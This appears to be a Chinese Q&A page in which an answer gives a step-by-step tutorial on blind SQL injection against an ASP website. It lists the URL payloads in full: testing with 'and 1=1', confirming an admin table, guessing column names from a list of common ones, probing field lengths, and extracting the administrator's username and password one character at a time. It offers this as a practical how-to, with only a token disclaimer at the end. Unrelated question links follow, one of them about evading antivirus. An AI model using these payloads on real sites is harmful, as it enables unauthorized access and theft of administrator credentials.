SQL漏洞怎麽用啊？要詳細點的！

在地址欄：

and 1=1

查看漏洞是否存在,如果存在就正常返回該頁,如果沒有,則顯示錯誤，繼續假設這個站的數據庫存在壹個admin表

在地址欄：

and 0<>(select count(*) from admin)

返回頁正常,假設成立了。

下面來猜猜看壹下管理員表裏面有幾個管理員ID：

and 1<(select count(*) from admin)

頁面什麽都沒有。管理員的數量等於或者小於1個

and 1=(select count(*) from admin)

輸入=1沒顯示錯誤，說明此站點只有壹個管理員。

下面就是要繼續猜測admin 裏面關於管理員用戶名和密碼的字段名稱。

and 1=(select count(*) from admin where len(username)>0)

猜解錯誤!不存在 username 這個字段。只要壹直改變括號裏面的username這個字段,下面給大家幾個常用的

user,users,member,members,userlist,memberlist,userinfo,admin,manager,用戶,yonghu

用戶名稱字段猜解完成之後繼續猜解密碼字段

and 1=(select count(*) from admin where len(password)>0)

password 字段存在！因為密碼字段壹般都是這個拉,如果不是就試試pass如果還不是就自己想想吧

我們已經知道了管理員表裏面有3個字段 id,user,password。

id 編號

user 用戶名

password 密碼

下面繼續的就是管理員用戶名和密碼的猜解了。壹個壹個來,有點麻煩,最好找個猜解機來

先猜出長度!

and 1=(select count(*) from admin where len(user)<10)

user 字段長度小於10

and 1=(select count(*) from admin where len(user)<5)

user 字段長度不小於5

慢慢的來,最後猜出長度等於6,請看下面,返回正常就說明猜解正確

and 1=(select count(*) from admin where len(user)=6)

下面猜密碼,

and 1=(select count(*) from admin where len(password)=10)

猜出來密碼10位,不要奇怪,現在網管都有防備的,所以密碼上20位也不太奇怪了

下面該做的就是把他們拆開來壹個壹個猜字母

and 1=(select count(*) from admin where left(user,1)=a)

返回正常，第壹位字母等於a,千萬不要把大寫和小寫給搞錯了哦~~呵呵,如果不a就繼續猜其他的字符落,反正猜到返回正常就算OK了

開始猜解帳號的第二位字符。

and 1=(select count(*) from admin where left(user,2)=ad)

就這樣壹次加壹個字符這樣猜,猜到夠妳剛才猜出來的多少位了就對了,帳號就算出來了

工作還沒有完,別忙著跑了,還有10位密碼,呵呵

and 1=(select count(*) from admin where left(password,1)=a)

經過無數次錯誤之後......

/new2/article_view.asp?id=2499 and 1=(select count(*) from admin where left(password,10)=administra)

結果密碼是administra

看完文章,大家不要照著我的文章做,網絡上的東西是變幻無窮的,但是我相信大家的大腦肯定比他變得快,所以希望大家看了這個文章靈活運用!那樣才能達到理想的效果

上一篇:海康威視硬盤錄像機用SADP軟件修改密碼步驟是什麽

下一篇:蘇州的護城河的資料

vb修改註冊表REG_Binary類型，要源碼

王麗莎，祝妳好運~

WTP是什麽？

工信部副部長點名APP亂象，廣告關不掉，怎樣才能屏蔽掉這些廣告？

暗影之刃3人類心靈穿梭法入門獲取方法及用法分析

氯同位素測量

怎麽做免殺。。